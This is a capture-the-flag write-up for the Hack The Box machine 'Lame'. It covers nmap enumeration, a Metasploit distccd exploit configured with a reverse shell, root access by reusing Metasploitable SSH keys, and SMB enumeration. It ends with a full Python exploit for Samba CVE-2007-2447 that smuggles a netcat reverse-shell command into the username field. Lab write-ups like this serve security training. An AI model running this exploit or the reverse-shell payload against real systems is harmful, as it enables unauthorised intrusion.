10.10.10.3 - Lame - DistCC, SMB, SSH Reuse

Metasploitable like VM - back to old school

Summary: vulnerable software : DistCCD; POC, Netbios-ssn; POC system vulnerable : 10.10.10.3 vulnerability explanation : privilege escalation: SSH keys reuse, SMB Service running as root. severity : critical

Enumeration:

[+] Running only TCP port scan
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:04 GMT
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: terminal|WAP|switch|specialized|general purpose|broadband router
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Chip PC embedded (92%), SNR embedded (90%), Crestron 2-Series (90%), Asus embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:snr:snr-s2960 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:2.4.18 cpe:/h:asus:rt-ac66u cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Chip PC XtremePC thin client (92%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (90%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (90%), SNR SNR-S2960 switch (90%), Crestron XPanel control system (90%), Linux 2.4.18 (90%), Asus RT-AC66U router (Linux 2.6) (89%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (89%), Asus RT-N16 WAP (Linux 2.6) (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.68 seconds

Nmap has a script that can confirm the vulnerability in distccd:

└──╼ $nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-02-02 13:23 GMT
Nmap scan report for 10.10.10.3
Host is up (0.19s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| http://distcc.googlecode.com/svn/trunk/doc/web/security.html
| http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|_ http://http://www.osvdb.org/13378
Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds

Distccd exploitation:

msf5 exploit(unix/misc/distcc_exec) > search distcc
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
msf5 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target

Result:

Whilst browsing the root folder I found .ssh folder containing authorized_keys file with a familiar login name msfadmin:

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

It made me think that this box was built upon popular pentesting VM - Metasploitable. I started this VM to compare the details and I have confirmed that kernel version is the same as well:

All I needed to do now, was to use metasploitable id_rsa keys to login as root without a password to Lame with a command:

ssh root@10.10.10.3 -i id_rsa

Share discovery on port 139:

└──╼ $smbmap -u "" -p "" -H 10.10.10.3
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.3...
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions
---- -----------
print$ NO ACCESS
tmp READ, WRITE
opt NO ACCESS
IPC$ NO ACCESS
ADMIN$ NO ACCESS
└──╼ $enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 2 13:08:53 2019
=======================================
| Share Enumeration on 10.10.10.3 |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Unable to initialize messaging context
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME

Searchsploit Samba 3.0.20

Python version of Samba 3.0.20 < 3.0.25rc3 - 'Username' map script'

#!/usr/bin/python
# -*- coding: utf-8 -*-
# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
username = "/=`nohup " + payload + "`"
conn = SMBConnection(username, "", "", "")
try:
conn.connect(rhost, int(rport), timeout=1)
except:
print '[+] Payload was sent - check netcat !'
if __name__ == '__main__':
print('[*] CVE-2007-2447 - Samba usermap script')
if len(sys.argv) != 5:
print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
else:
print("[+] Connecting !")
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
exploit(rhost, rport, lhost, lport)

Exploit:

Result: